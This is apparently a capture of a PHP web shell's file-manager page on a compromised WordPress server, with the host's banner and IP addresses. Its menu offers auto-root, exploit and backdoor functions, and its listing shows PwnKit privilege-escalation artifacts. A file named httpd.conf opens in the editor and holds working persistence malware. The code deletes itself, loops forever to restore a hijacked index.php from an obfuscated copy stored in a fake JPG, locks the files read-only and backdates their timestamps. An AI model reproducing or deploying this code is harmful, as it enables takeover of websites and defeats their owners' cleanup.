Linux ns3224172.ip-57-128-33.eu 4.18.0-477.21.1.el8_8.x86_64 #1 SMP Thu Aug 10 13:51:50 EDT 2023 x86_64
Apache
: 57.128.33.164 | : 18.217.10.200
Cant Read [ /etc/named.conf ]
chequecadeau.alsace_xqzidmjoah
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
var /
www /
vhosts /
valdargent.chequecadeau.alsace /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
199
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
connects.php
18.89
KB
-r--r--r--
google8140b607fb19ecb4.html
53
B
-rw-r--r--
httpd.conf
21.89
KB
-r--r--r--
index.php
14.01
KB
-r--r--r--
license.txt
19.45
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
robots.txt
1.43
KB
-rw-r--r--
style.php
13.04
KB
-rw-r--r--
wp-22.php
14.24
KB
-rw-r--r--
wp-activate.php
7.21
KB
-rw-r--r--
wp-blog-header.php
350
B
-rw-r--r--
wp-comments-post.php
2.27
KB
-rw-r--r--
wp-config-sample.php
3.26
KB
-rw-r--r--
wp-config.php
3.92
KB
-rw-------
wp-cron.php
5.49
KB
-rw-r--r--
wp-links-opml.php
2.44
KB
-rw-r--r--
wp-load.php
3.84
KB
-rw-r--r--
wp-login.php
50.16
KB
-rw-r--r--
wp-mail.php
8.34
KB
-rw-r--r--
wp-settings.php
28.35
KB
-rw-r--r--
wp-signup.php
33.58
KB
-rw-r--r--
wp-trackback.php
4.98
KB
-rw-r--r--
xmlrpc.php
3.17
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : httpd.conf
<?php error_reporting(0); set_time_limit(0); ignore_user_abort(true); $path = "/var/www/vhosts/valdargent.chequecadeau.alsace/public_html/"; $path = str_replace("\\", "/", $path); $do = rtrim($path,"/") . "/"; @unlink(__FILE__); while (true) { usleep(1000000 * 0.3); try { $ruzhu_php_jm = ""; $fengexian = base64_decode("fHstLi0hISF9fA"); $index_path = $do . "index.php"; $fp_old_index = @file_get_contents($do . "index.php"); $wp_head_path = $do . "wp-blog-header.php"; $wp_blog_header = @file_get_contents($wp_head_path); $is_wp = (file_exists($wp_head_path) and (substr_count($wp_blog_header, "WordPress") > 0)) ? true : false; if ($is_wp) { $index_new_con = base64_decode($ruzhu_php_jm) . base64_decode("PD9waHAgZGVmaW5lKCAnV1BfVVNFX1RIRU1FUycsIHRydWUgKTsgcmVxdWlyZSgnLi93cC1ibG9nLWhlYWRlci5waHAnKTs/Pg"); } else { $index_new_con = base64_decode($ruzhu_php_jm) . trim($fp_old_index); } $new_img = $do . "images"; @mkdir($new_img); @chmod($new_img, 0755); $cache_jpg = $new_img . "/toggige-arrow.jpg"; $index_cache_jpg = @file_get_contents($cache_jpg); $ex_jpg = explode($fengexian, $index_cache_jpg); $r_index_jpg_con = base64_decode(str_rot13($ex_jpg[1])); if (file_exists($cache_jpg)) { if ($ex_jpg[0] === md5($ex_jpg[1])) { if (md5($r_index_jpg_con) !== md5($fp_old_index)) { // 首页被改动 @chmod($index_path, 0644); @unlink($index_path); $ok = @file_put_contents($index_path, $r_index_jpg_con) ? "1" : "0"; @touch($index_path, filectime($index_path)); @chmod($index_path, 0444); } } else { $str13 = str_rot13(base64_encode($index_new_con)); $cache_jpg_con = md5($str13) . $fengexian . $str13; @file_put_contents($cache_jpg, $cache_jpg_con); @touch($cache_jpg, filectime($index_path)); @chmod($cache_jpg, 0444); if (md5($r_index_jpg_con) !== md5($fp_old_index)) { // 首页被改动 @chmod($index_path, 0644); @unlink($index_path); $ok = @file_put_contents($index_path, $index_new_con) ? "1" : "0"; @touch($index_path, filectime($index_path)); @chmod($index_path, 0444); } } } else { // 没有的时候生成一份出来 $str13 = str_rot13(base64_encode($index_new_con)); $cache_jpg_con = md5($str13) . $fengexian . $str13; @file_put_contents($cache_jpg, $cache_jpg_con); @touch($cache_jpg, filectime($index_path)); @chmod($cache_jpg, 0444); @chmod($index_path, 0644); @unlink($index_path); $ok = @file_put_contents($index_path, $index_new_con) ? "1" : "0"; @touch($index_path, filectime($index_path)); @chmod($index_path, 0444); } } catch (Exception $e) { } } ?>
Close